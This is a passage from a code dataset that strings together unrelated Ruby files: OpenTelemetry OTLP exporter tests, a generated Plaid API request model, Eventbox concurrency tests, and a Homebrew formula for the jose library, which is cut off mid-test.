_(error.message).must_match(/headers/i)
error = _() {
with_env('OTEL_EXPORTER_OTLP_TRACES_HEADERS' => ',') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
}.must_raise(ArgumentError)
_(error.message).must_match(/headers/i)
end
it 'fails fast when header values contain invalid escape characters' do
error = _() {
with_env('OTEL_EXPORTER_OTLP_HEADERS' => 'c=hi%F3') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
}.must_raise(ArgumentError)
_(error.message).must_match(/headers/i)
error = _() {
with_env('OTEL_EXPORTER_OTLP_TRACES_HEADERS' => 'c=hi%F3') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
}.must_raise(ArgumentError)
_(error.message).must_match(/headers/i)
end
it 'fails fast when headers are invalid' do
error = _() {
with_env('OTEL_EXPORTER_OTLP_HEADERS' => 'this is not a header') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
}.must_raise(ArgumentError)
_(error.message).must_match(/headers/i)
error = _() {
with_env('OTEL_EXPORTER_OTLP_TRACES_HEADERS' => 'this is not a header') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
}.must_raise(ArgumentError)
_(error.message).must_match(/headers/i)
end
end
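# The behaviour exercised in this block corresponds roughly to the
# following parsing scheme (an illustrative sketch, not the exporter's
# actual private implementation): split on ',', split each entry on the
# first '=', URL-decode both sides, and strip surrounding whitespace.
#
# def parse_headers(raw)
#   entries = raw.split(',')
#   raise ArgumentError, 'invalid headers' if entries.empty?
#   entries.to_h do |entry|
#     k, v = entry.split('=', 2)
#     raise ArgumentError, 'invalid headers' if k.nil? || v.nil?
#     k = CGI.unescape(k).strip
#     v = CGI.unescape(v).strip
#     raise ArgumentError, 'invalid headers' if k.empty? || v.empty?
#     [k, v]
#   end
# end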
end
describe 'ssl_verify_mode:' do
it 'can be set to VERIFY_NONE by an envvar' do
exp = with_env('OTEL_RUBY_EXPORTER_OTLP_SSL_VERIFY_NONE' => 'true') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
http = exp.instance_variable_get(:@http)
_(http.verify_mode).must_equal OpenSSL::SSL::VERIFY_NONE
end
it 'can be set to VERIFY_PEER by an envvar' do
exp = with_env('OTEL_RUBY_EXPORTER_OTLP_SSL_VERIFY_PEER' => 'true') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
http = exp.instance_variable_get(:@http)
_(http.verify_mode).must_equal OpenSSL::SSL::VERIFY_PEER
end
it 'VERIFY_PEER will override VERIFY_NONE' do
exp = with_env('OTEL_RUBY_EXPORTER_OTLP_SSL_VERIFY_NONE' => 'true',
'OTEL_RUBY_EXPORTER_OTLP_SSL_VERIFY_PEER' => 'true') do
OpenTelemetry::Exporter::OTLP::Exporter.new
end
http = exp.instance_variable_get(:@http)
_(http.verify_mode).must_equal OpenSSL::SSL::VERIFY_PEER
end
end
describe '#export' do
let(:exporter) { OpenTelemetry::Exporter::OTLP::Exporter.new }
before do
OpenTelemetry.tracer_provider = OpenTelemetry::SDK::Trace::TracerProvider.new(resource: OpenTelemetry::SDK::Resources::Resource.telemetry_sdk)
end
it 'integrates with collector' do
skip unless ENV['TRACING_INTEGRATION_TEST']
WebMock.disable_net_connect!(allow: 'localhost')
span_data = create_span_data
exporter = OpenTelemetry::Exporter::OTLP::Exporter.new(endpoint: 'http://localhost:4318', compression: 'gzip')
result = exporter.export([span_data])
_(result).must_equal(SUCCESS)
end
it 'retries on timeout' do
stub_request(:post, 'https://localhost:4318/v1/traces').to_timeout.then.to_return(status: 200)
span_data = create_span_data
result = exporter.export([span_data])
_(result).must_equal(SUCCESS)
end
it 'returns TIMEOUT on timeout' do
stub_request(:post, 'https://localhost:4318/v1/traces').to_return(status: 200)
span_data = create_span_data
result = exporter.export([span_data], timeout: 0)
_(result).must_equal(TIMEOUT)
end
it 'returns FAILURE on unexpected exceptions' do
log_stream = StringIO.new
logger = OpenTelemetry.logger
OpenTelemetry.logger = ::Logger.new(log_stream)
stub_request(:post, 'https://localhost:4318/v1/traces').to_raise('something unexpected')
span_data = create_span_data
result = exporter.export([span_data], timeout: 1)
_(log_stream.string).must_match(
/ERROR -- : OpenTelemetry error: unexpected error in OTLP::Exporter#send_bytes - something unexpected/
)
_(result).must_equal(FAILURE)
ensure
OpenTelemetry.logger = logger
end
it 'handles encoding failures' do
log_stream = StringIO.new
logger = OpenTelemetry.logger
OpenTelemetry.logger = ::Logger.new(log_stream)
stub_request(:post, 'https://localhost:4318/v1/traces').to_return(status: 200)
span_data = create_span_data
Opentelemetry::Proto::Collector::Trace::V1::ExportTraceServiceRequest.stub(:encode, ->(_) { raise 'a little hell' }) do
_(exporter.export([span_data], timeout: 1)).must_equal(FAILURE)
end
_(log_stream.string).must_match(
/ERROR -- : OpenTelemetry error: unexpected error in OTLP::Exporter#encode - a little hell/
)
ensure
OpenTelemetry.logger = logger
end
it 'returns TIMEOUT on timeout after retrying' do
stub_request(:post, 'https://localhost:4318/v1/traces').to_timeout.then.to_raise('this should not be reached')
span_data = create_span_data
@retry_count = 0
backoff_stubbed_call = lambda do |**_args|
sleep(0.10)
@retry_count += 1
true
end
exporter.stub(:backoff?, backoff_stubbed_call) do
_(exporter.export([span_data], timeout: 0.1)).must_equal(TIMEOUT)
end
ensure
@retry_count = 0
end
it 'returns FAILURE when shutdown' do
exporter.shutdown
result = exporter.export(nil)
_(result).must_equal(FAILURE)
end
it 'returns FAILURE when encryption to receiver endpoint fails' do
stub_request(:post, 'https://localhost:4318/v1/traces').to_raise(OpenSSL::SSL::SSLError.new('enigma wedged'))
span_data = create_span_data
exporter.stub(:backoff?, ->(**_) { false }) do
_(exporter.export([span_data])).must_equal(FAILURE)
end
end
it 'exports a span_data' do
stub_request(:post, 'https://localhost:4318/v1/traces').to_return(status: 200)
span_data = create_span_data
result = exporter.export([span_data])
_(result).must_equal(SUCCESS)
end
it 'handles encoding errors with poise and grace' do
log_stream = StringIO.new
logger = OpenTelemetry.logger
OpenTelemetry.logger = ::Logger.new(log_stream)
stub_request(:post, 'https://localhost:4318/v1/traces').to_return(status: 200)
span_data = create_span_data(total_recorded_attributes: 1, attributes: { 'a' => "\xC2".dup.force_encoding(::Encoding::ASCII_8BIT) })
result = exporter.export([span_data])
_(log_stream.string).must_match(
/ERROR -- : OpenTelemetry error: encoding error for key a and value �/
)
_(result).must_equal(SUCCESS)
ensure
OpenTelemetry.logger = logger
end
it 'handles Zlib gzip compression errors' do
stub_request(:post, 'https://localhost:4318/v1/traces').to_raise(Zlib::DataError.new('data error'))
span_data = create_span_data
exporter.stub(:backoff?, ->(**_) { false }) do
_(exporter.export([span_data])).must_equal(FAILURE)
end
end
it 'exports a span from a tracer' do
stub_post = stub_request(:post, 'https://localhost:4318/v1/traces').to_return(status: 200)
processor = OpenTelemetry::SDK::Trace::Export::BatchSpanProcessor.new(exporter, max_queue_size: 1, max_export_batch_size: 1)
OpenTelemetry.tracer_provider.add_span_processor(processor)
OpenTelemetry.tracer_provider.tracer.start_root_span('foo').finish
OpenTelemetry.tracer_provider.shutdown
assert_requested(stub_post)
end
it 'compresses with gzip if enabled' do
exporter = OpenTelemetry::Exporter::OTLP::Exporter.new(compression: 'gzip')
stub_post = stub_request(:post, 'https://localhost:4318/v1/traces').to_return do |request|
Opentelemetry::Proto::Collector::Trace::V1::ExportTraceServiceRequest.decode(Zlib.gunzip(request.body))
{ status: 200 }
end
span_data = create_span_data
result = exporter.export([span_data])
_(result).must_equal(SUCCESS)
assert_requested(stub_post)
end
it 'batches per resource' do
etsr = nil
stub_post = stub_request(:post, 'https://localhost:4318/v1/traces').to_return do |request|
etsr = Opentelemetry::Proto::Collector::Trace::V1::ExportTraceServiceRequest.decode(request.body)
{ status: 200 }
end
span_data1 = create_span_data(resource: OpenTelemetry::SDK::Resources::Resource.create('k1' => 'v1'))
span_data2 = create_span_data(resource: OpenTelemetry::SDK::Resources::Resource.create('k2' => 'v2'))
result = exporter.export([span_data1, span_data2])
_(result).must_equal(SUCCESS)
assert_requested(stub_post)
_(etsr.resource_spans.length).must_equal(2)
end
it 'translates all the things' do
stub_request(:post, 'https://localhost:4318/v1/traces').to_return(status: 200)
processor = OpenTelemetry::SDK::Trace::Export::BatchSpanProcessor.new(exporter)
tracer = OpenTelemetry.tracer_provider.tracer('tracer', 'v0.0.1')
other_tracer = OpenTelemetry.tracer_provider.tracer('other_tracer')
trace_id = OpenTelemetry::Trace.generate_trace_id
root_span_id = OpenTelemetry::Trace.generate_span_id
child_span_id = OpenTelemetry::Trace.generate_span_id
client_span_id = OpenTelemetry::Trace.generate_span_id
server_span_id = OpenTelemetry::Trace.generate_span_id
consumer_span_id = OpenTelemetry::Trace.generate_span_id
start_timestamp = Time.now
end_timestamp = start_timestamp + 6
OpenTelemetry.tracer_provider.add_span_processor(processor)
root = with_ids(trace_id, root_span_id) { tracer.start_root_span('root', kind: :internal, start_timestamp: start_timestamp) }
root.status = OpenTelemetry::Trace::Status.ok
root.finish(end_timestamp: end_timestamp)
root_ctx = OpenTelemetry::Trace.context_with_span(root)
span = with_ids(trace_id, child_span_id) { tracer.start_span('child', with_parent: root_ctx, kind: :producer, start_timestamp: start_timestamp + 1, links: [OpenTelemetry::Trace::Link.new(root.context, 'attr' => 4)]) }
span['b'] = true
span['f'] = 1.1
span['i'] = 2
span['s'] = 'val'
span['a'] = [3, 4]
span.status = OpenTelemetry::Trace::Status.error
child_ctx = OpenTelemetry::Trace.context_with_span(span)
client = with_ids(trace_id, client_span_id) { tracer.start_span('client', with_parent: child_ctx, kind: :client, start_timestamp: start_timestamp + 2).finish(end_timestamp: end_timestamp) }
client_ctx = OpenTelemetry::Trace.context_with_span(client)
with_ids(trace_id, server_span_id) { other_tracer.start_span('server', with_parent: client_ctx, kind: :server, start_timestamp: start_timestamp + 3).finish(end_timestamp: end_timestamp) }
span.add_event('event', attributes: { 'attr' => 42 }, timestamp: start_timestamp + 4)
with_ids(trace_id, consumer_span_id) { tracer.start_span('consumer', with_parent: child_ctx, kind: :consumer, start_timestamp: start_timestamp + 5).finish(end_timestamp: end_timestamp) }
span.finish(end_timestamp: end_timestamp)
OpenTelemetry.tracer_provider.shutdown
encoded_etsr = Opentelemetry::Proto::Collector::Trace::V1::ExportTraceServiceRequest.encode(
Opentelemetry::Proto::Collector::Trace::V1::ExportTraceServiceRequest.new(
resource_spans: [
Opentelemetry::Proto::Trace::V1::ResourceSpans.new(
resource: Opentelemetry::Proto::Resource::V1::Resource.new(
attributes: [
Opentelemetry::Proto::Common::V1::KeyValue.new(key: 'telemetry.sdk.name', value: Opentelemetry::Proto::Common::V1::AnyValue.new(string_value: 'opentelemetry')),
Opentelemetry::Proto::Common::V1::KeyValue.new(key: 'telemetry.sdk.language', value: Opentelemetry::Proto::Common::V1::AnyValue.new(string_value: 'ruby')),
Opentelemetry::Proto::Common::V1::KeyValue.new(key: 'telemetry.sdk.version', value: Opentelemetry::Proto::Common::V1::AnyValue.new(string_value: OpenTelemetry::SDK::VERSION))
]
),
instrumentation_library_spans: [
Opentelemetry::Proto::Trace::V1::InstrumentationLibrarySpans.new(
instrumentation_library: Opentelemetry::Proto::Common::V1::InstrumentationLibrary.new(
name: 'tracer',
version: 'v0.0.1'
),
spans: [
Opentelemetry::Proto::Trace::V1::Span.new(
trace_id: trace_id,
span_id: root_span_id,
parent_span_id: nil,
name: 'root',
kind: Opentelemetry::Proto::Trace::V1::Span::SpanKind::SPAN_KIND_INTERNAL,
start_time_unix_nano: (start_timestamp.to_r * 1_000_000_000).to_i,
end_time_unix_nano: (end_timestamp.to_r * 1_000_000_000).to_i,
status: Opentelemetry::Proto::Trace::V1::Status.new(
code: Opentelemetry::Proto::Trace::V1::Status::StatusCode::STATUS_CODE_OK
)
),
Opentelemetry::Proto::Trace::V1::Span.new(
trace_id: trace_id,
span_id: client_span_id,
parent_span_id: child_span_id,
name: 'client',
kind: Opentelemetry::Proto::Trace::V1::Span::SpanKind::SPAN_KIND_CLIENT,
start_time_unix_nano: ((start_timestamp + 2).to_r * 1_000_000_000).to_i,
end_time_unix_nano: (end_timestamp.to_r * 1_000_000_000).to_i,
status: Opentelemetry::Proto::Trace::V1::Status.new(
code: Opentelemetry::Proto::Trace::V1::Status::StatusCode::STATUS_CODE_UNSET
)
),
Opentelemetry::Proto::Trace::V1::Span.new(
trace_id: trace_id,
span_id: consumer_span_id,
parent_span_id: child_span_id,
name: 'consumer',
kind: Opentelemetry::Proto::Trace::V1::Span::SpanKind::SPAN_KIND_CONSUMER,
start_time_unix_nano: ((start_timestamp + 5).to_r * 1_000_000_000).to_i,
end_time_unix_nano: (end_timestamp.to_r * 1_000_000_000).to_i,
status: Opentelemetry::Proto::Trace::V1::Status.new(
code: Opentelemetry::Proto::Trace::V1::Status::StatusCode::STATUS_CODE_UNSET
)
),
Opentelemetry::Proto::Trace::V1::Span.new(
trace_id: trace_id,
span_id: child_span_id,
parent_span_id: root_span_id,
name: 'child',
kind: Opentelemetry::Proto::Trace::V1::Span::SpanKind::SPAN_KIND_PRODUCER,
start_time_unix_nano: ((start_timestamp + 1).to_r * 1_000_000_000).to_i,
end_time_unix_nano: (end_timestamp.to_r * 1_000_000_000).to_i,
attributes: [
Opentelemetry::Proto::Common::V1::KeyValue.new(key: 'b', value: Opentelemetry::Proto::Common::V1::AnyValue.new(bool_value: true)),
Opentelemetry::Proto::Common::V1::KeyValue.new(key: 'f', value: Opentelemetry::Proto::Common::V1::AnyValue.new(double_value: 1.1)),
Opentelemetry::Proto::Common::V1::KeyValue.new(key: 'i', value: Opentelemetry::Proto::Common::V1::AnyValue.new(int_value: 2)),
Opentelemetry::Proto::Common::V1::KeyValue.new(key: 's', value: Opentelemetry::Proto::Common::V1::AnyValue.new(string_value: 'val')),
Opentelemetry::Proto::Common::V1::KeyValue.new(
key: 'a',
value: Opentelemetry::Proto::Common::V1::AnyValue.new(
array_value: Opentelemetry::Proto::Common::V1::ArrayValue.new(
values: [
Opentelemetry::Proto::Common::V1::AnyValue.new(int_value: 3),
Opentelemetry::Proto::Common::V1::AnyValue.new(int_value: 4)
]
)
)
)
],
events: [
Opentelemetry::Proto::Trace::V1::Span::Event.new(
time_unix_nano: ((start_timestamp + 4).to_r * 1_000_000_000).to_i,
name: 'event',
attributes: [
Opentelemetry::Proto::Common::V1::KeyValue.new(key: 'attr', value: Opentelemetry::Proto::Common::V1::AnyValue.new(int_value: 42))
]
)
],
links: [
Opentelemetry::Proto::Trace::V1::Span::Link.new(
trace_id: trace_id,
span_id: root_span_id,
attributes: [
Opentelemetry::Proto::Common::V1::KeyValue.new(key: 'attr', value: Opentelemetry::Proto::Common::V1::AnyValue.new(int_value: 4))
]
)
],
status: Opentelemetry::Proto::Trace::V1::Status.new(
code: Opentelemetry::Proto::Trace::V1::Status::StatusCode::STATUS_CODE_ERROR
)
)
]
),
Opentelemetry::Proto::Trace::V1::InstrumentationLibrarySpans.new(
instrumentation_library: Opentelemetry::Proto::Common::V1::InstrumentationLibrary.new(
name: 'other_tracer'
),
spans: [
Opentelemetry::Proto::Trace::V1::Span.new(
trace_id: trace_id,
span_id: server_span_id,
parent_span_id: client_span_id,
name: 'server',
kind: Opentelemetry::Proto::Trace::V1::Span::SpanKind::SPAN_KIND_SERVER,
start_time_unix_nano: ((start_timestamp + 3).to_r * 1_000_000_000).to_i,
end_time_unix_nano: (end_timestamp.to_r * 1_000_000_000).to_i,
status: Opentelemetry::Proto::Trace::V1::Status.new(
code: Opentelemetry::Proto::Trace::V1::Status::StatusCode::STATUS_CODE_UNSET
)
)
]
)
]
)
]
)
)
assert_requested(:post, 'https://localhost:4318/v1/traces') do |req|
req.body == encoded_etsr
end
end
end
def with_ids(trace_id, span_id)
OpenTelemetry::Trace.stub(:generate_trace_id, trace_id) do
OpenTelemetry::Trace.stub(:generate_span_id, span_id) do
yield
end
end
end
def create_span_data(name: '', kind: nil, status: nil, parent_span_id: OpenTelemetry::Trace::INVALID_SPAN_ID,
total_recorded_attributes: 0, total_recorded_events: 0, total_recorded_links: 0, start_timestamp: exportable_timestamp,
end_timestamp: exportable_timestamp, attributes: nil, links: nil, events: nil, resource: nil,
instrumentation_library: OpenTelemetry::SDK::InstrumentationLibrary.new('', 'v0.0.1'),
span_id: OpenTelemetry::Trace.generate_span_id, trace_id: OpenTelemetry::Trace.generate_trace_id,
trace_flags: OpenTelemetry::Trace::TraceFlags::DEFAULT, tracestate: nil)
resource ||= OpenTelemetry::SDK::Resources::Resource.telemetry_sdk
OpenTelemetry::SDK::Trace::SpanData.new(name, kind, status, parent_span_id, total_recorded_attributes,
total_recorded_events, total_recorded_links, start_timestamp, end_timestamp,
attributes, links, events, resource, instrumentation_library, span_id, trace_id, trace_flags, tracestate)
end
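# For reference: the `with_env` helper used throughout this file comes from
# the shared test_helper. A minimal sketch (assuming single-threaded test
# runs; not the suite's verbatim implementation) could look like:
#
# def with_env(new_env)
#   previous = ENV.to_hash.slice(*new_env.keys)
#   new_env.each_pair { |k, v| ENV[k] = v }
#   yield
# ensure
#   new_env.each_key { |k| ENV.delete(k) }
#   previous.each_pair { |k, v| ENV[k] = v }
# end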
end
| 46.650564 | 223 | 0.613807 |
21ce1a64c735fd798de4519a1165ee1c7957f8db | 230 | #!/usr/bin/env ruby
#---
# Excerpted from "Everyday Scripting in Ruby"
# We make no guarantees that this code is fit for any purpose.
# Visit http://www.pragmaticprogrammer.com/titles/bmsft for more book information.
#---
ONE=1
| 25.555556 | 82 | 0.730435 |
6a25ac2f60dae274eae0d627dbc5c369ec86c038 | 10,469 | =begin
#The Plaid API
#The Plaid REST API. Please see https://plaid.com/docs/api for more details.
The version of the OpenAPI document: 2020-09-14_1.20.6
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 5.1.0
=end
require 'date'
require 'time'
module Plaid
# AssetReportCreateRequest defines the request schema for `/asset_report/create`
class AssetReportCreateRequest
# Your Plaid API `client_id`. The `client_id` is required and may be provided either in the `PLAID-CLIENT-ID` header or as part of a request body.
attr_accessor :client_id
# Your Plaid API `secret`. The `secret` is required and may be provided either in the `PLAID-SECRET` header or as part of a request body.
attr_accessor :secret
# An array of access tokens corresponding to the Items that will be included in the report. The `assets` product must have been initialized for the Items during link; the Assets product cannot be added after initialization.
attr_accessor :access_tokens
# The maximum integer number of days of history to include in the Asset Report. If using Fannie Mae Day 1 Certainty, `days_requested` must be at least 61 for new originations or at least 31 for refinancings.
attr_accessor :days_requested
attr_accessor :options
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'client_id' => :'client_id',
:'secret' => :'secret',
:'access_tokens' => :'access_tokens',
:'days_requested' => :'days_requested',
:'options' => :'options'
}
end
# Returns all the JSON keys this model knows about
def self.acceptable_attributes
attribute_map.values
end
# Attribute type mapping.
def self.openapi_types
{
:'client_id' => :'String',
:'secret' => :'String',
:'access_tokens' => :'Array<String>',
:'days_requested' => :'Integer',
:'options' => :'AssetReportCreateRequestOptions'
}
end
# List of attributes with nullable: true
def self.openapi_nullable
Set.new([
])
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
if (!attributes.is_a?(Hash))
fail ArgumentError, "The input argument (attributes) must be a hash in `Plaid::AssetReportCreateRequest` initialize method"
end
# check to see if the attribute exists and convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h|
if (!self.class.attribute_map.key?(k.to_sym))
fail ArgumentError, "`#{k}` is not a valid attribute in `Plaid::AssetReportCreateRequest`. Please check the name to make sure it's valid. List of attributes: " + self.class.attribute_map.keys.inspect
end
h[k.to_sym] = v
}
if attributes.key?(:'client_id')
self.client_id = attributes[:'client_id']
end
if attributes.key?(:'secret')
self.secret = attributes[:'secret']
end
if attributes.key?(:'access_tokens')
if (value = attributes[:'access_tokens']).is_a?(Array)
self.access_tokens = value
end
end
if attributes.key?(:'days_requested')
self.days_requested = attributes[:'days_requested']
end
if attributes.key?(:'options')
self.options = attributes[:'options']
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @access_tokens.nil?
invalid_properties.push('invalid value for "access_tokens", access_tokens cannot be nil.')
end
if @access_tokens.length > 99
invalid_properties.push('invalid value for "access_tokens", number of items must be less than or equal to 99.')
end
if @access_tokens.length < 1
invalid_properties.push('invalid value for "access_tokens", number of items must be greater than or equal to 1.')
end
if @days_requested.nil?
invalid_properties.push('invalid value for "days_requested", days_requested cannot be nil.')
end
if @days_requested > 730
invalid_properties.push('invalid value for "days_requested", must be smaller than or equal to 730.')
end
if @days_requested < 0
invalid_properties.push('invalid value for "days_requested", must be greater than or equal to 0.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @access_tokens.nil?
return false if @access_tokens.length > 99
return false if @access_tokens.length < 1
return false if @days_requested.nil?
return false if @days_requested > 730
return false if @days_requested < 0
true
end
# Custom attribute writer method with validation
# @param [Object] access_tokens Value to be assigned
def access_tokens=(access_tokens)
if access_tokens.nil?
fail ArgumentError, 'access_tokens cannot be nil'
end
if access_tokens.length > 99
fail ArgumentError, 'invalid value for "access_tokens", number of items must be less than or equal to 99.'
end
if access_tokens.length < 1
fail ArgumentError, 'invalid value for "access_tokens", number of items must be greater than or equal to 1.'
end
@access_tokens = access_tokens
end
# Custom attribute writer method with validation
# @param [Object] days_requested Value to be assigned
def days_requested=(days_requested)
if days_requested.nil?
fail ArgumentError, 'days_requested cannot be nil'
end
if days_requested > 730
fail ArgumentError, 'invalid value for "days_requested", must be smaller than or equal to 730.'
end
if days_requested < 0
fail ArgumentError, 'invalid value for "days_requested", must be greater than or equal to 0.'
end
@days_requested = days_requested
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
client_id == o.client_id &&
secret == o.secret &&
access_tokens == o.access_tokens &&
days_requested == o.days_requested &&
options == o.options
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Integer] Hash code
def hash
[client_id, secret, access_tokens, days_requested, options].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def self.build_from_hash(attributes)
new.build_from_hash(attributes)
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.openapi_types.each_pair do |key, type|
if attributes[self.class.attribute_map[key]].nil? && self.class.openapi_nullable.include?(key)
self.send("#{key}=", nil)
elsif type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :Time
Time.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :Boolean
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
# models (e.g. Pet) or oneOf
klass = Plaid.const_get(type)
klass.respond_to?(:openapi_one_of) ? klass.build(value) : klass.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
if value.nil?
is_nullable = self.class.openapi_nullable.include?(attr)
next if !is_nullable || (is_nullable && !instance_variable_defined?(:"@#{attr}"))
end
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
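# Illustrative usage (a sketch; the access token below is a placeholder,
# and client_id/secret are usually supplied via the API client config):
#
# request = Plaid::AssetReportCreateRequest.new(
#   access_tokens: ['access-sandbox-xxx'],
#   days_requested: 60
# )
# request.valid? # => true (1..99 tokens, 0..730 days requested)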
| 32.311728 | 227 | 0.643232 |
ab99be994853aafae335dfb3562943038d053d78 | 95 | require 'cla_signature_authorizer'
class IclaSignatureAuthorizer < ClaSignatureAuthorizer
end
| 19 | 54 | 0.884211 |
38585af060a27bb316c01c7a880cb5874e5492b5 | 3,255 | require_relative "../test_helper"
class ExamplesConcurrentWorkersTest < Minitest::Test
class ConcurrentWorkers < Eventbox
async_call def init
@tasks = []
@waiting = {}
@working = {}
end
async_call def add_worker(workerid)
worker(workerid)
end
action def worker(workerid)
while n=next_task(workerid)
task_finished(workerid, "#{n} finished")
end
end
yield_call def process(name, result)
if @waiting.empty?
@tasks << [result, name]
else
workerid, input = @waiting.shift
input.yield name
@working[workerid] = result
end
end
private yield_call def next_task(workerid, input)
if @tasks.empty?
@waiting[workerid] = input
else
result, name = @tasks.shift
input.yield name
@working[workerid] = result
end
end
private async_call def task_finished(workerid, result)
@working.delete(workerid).yield result
end
end
def test_concurrent_workers
cw = ConcurrentWorkers.new
values = 10.times.map do |taskid|
Thread.new do
cw.add_worker(taskid) if taskid > 5
cw.process "task #{taskid}"
end
end.map(&:value)
assert_equal 10.times.map { |i| "task #{i} finished" }, values
cw.shutdown!
end
class ConcurrentWorkers2 < ConcurrentWorkers
private def check_work
while @tasks.any? && @waiting.any?
workerid, input = @waiting.shift
result, name = @tasks.shift
input.yield name
@working[workerid] = result
end
end
yield_call def process(name, result)
@tasks << [result, name]
check_work
end
private yield_call def next_task(workerid, input)
@waiting[workerid] = input
check_work
end
end
def test_concurrent_workers2
cw = ConcurrentWorkers2.new
cw.add_worker(0)
values = 10.times.map do |taskid|
Thread.new do
cw.add_worker(taskid) if taskid > 5
cw.process("task #{taskid}")
end
end.map(&:value)
assert_equal 10.times.map{|i| "task #{i} finished" }, values
cw.shutdown!
end
class ConcurrentWorkersWithCallback < ConcurrentWorkers2
async_call def init
super
@notify_when_finished = []
end
async_call def process(name, &block)
@tasks << [block, name]
check_work
end
sync_call def task_finished(workerid, result)
@working.delete(workerid).yield result
if @tasks.empty? && @working.empty?
@notify_when_finished.each(&:yield)
end
end
yield_call def finish_tasks(result)
if @tasks.empty? && @working.empty?
result.yield
else
@notify_when_finished << result
end
end
end
def test_concurrent_workers_with_callback
cw = ConcurrentWorkersWithCallback.new
cw.add_worker(0)
values = Queue.new
10.times do |taskid|
cw.add_worker(taskid) if taskid > 5
cw.process("task #{taskid}") do |result|
values << [taskid, result]
end
end
cw.finish_tasks # blocks until all queued tasks have finished
assert_equal 10.times.map{|i| [i, "task #{i} finished"] }, 10.times.map{ values.deq }.sort
cw.shutdown!
end
end
| 23.25 | 94 | 0.626114 |
f84598f8ccf018df3d53e53df7272ff4bd5b68bd | 195 | module Eugeneral
module Comparisons
class GreaterThan < Comparitor
def resolve(args=[])
value_for(subject, args) > value_for(object, args)
end
end
end
end
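# Hypothetical usage (Comparitor and value_for are defined elsewhere in
# this gem; the constructor shown here is assumed, not verified):
#
# gt = Eugeneral::Comparisons::GreaterThan.new(subject: 5, object: 3)
# gt.resolve # => true, since 5 > 3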
| 16.25 | 58 | 0.630769 |
1c012e45e0372804ef6830ec0339ed986e5eb4b3 | 1,746 | class Jose < Formula
desc "C-language implementation of Javascript Object Signing and Encryption"
homepage "https://github.com/latchset/jose"
url "https://github.com/latchset/jose/releases/download/v10/jose-10.tar.bz2"
sha256 "5c9cdcfb535c4d9f781393d7530521c72b1dd81caa9934cab6dd752cc7efcd72"
revision 1
bottle do
cellar :any
sha256 "359c58b36bb631623273a77d13431f29ff467e9602f1500f9e4fa761ed0719be" => :catalina
sha256 "358a06afd49f1390ca917969dbb434a75a91bd0de3d8ac981d3eab969670cfe2" => :mojave
sha256 "7a84bdaece281b98dc4a7b0a7fbf05976297126966d14ee2862e007521cdd4ea" => :high_sierra
sha256 "1669bf780ac07ee9a7d216185139aaa6e5c44add352e6da25f02c079694e7ad1" => :sierra
sha256 "c25d394204f9e85075ca1e92d9bbf0fe3c619797f548233ea6b58ddd95045238" => :x86_64_linux
end
depends_on "pkg-config" => :build
depends_on "jansson"
depends_on "[email protected]"
uses_from_macos "zlib"
def install
system "./configure", "--disable-dependency-tracking",
"--disable-silent-rules",
"--prefix=#{prefix}"
system "make"
system "make", "check"
system "make", "install"
end
test do
system bin/"jose", "jwk", "gen", "-i", '{"alg": "A128GCM"}', "-o", "oct.jwk"
system bin/"jose", "jwk", "gen", "-i", '{"alg": "RSA1_5"}', "-o", "rsa.jwk"
system bin/"jose", "jwk", "pub", "-i", "rsa.jwk", "-o", "rsa.pub.jwk"
system "echo hi | #{bin}/jose jwe enc -I - -k rsa.pub.jwk -o msg.jwe"
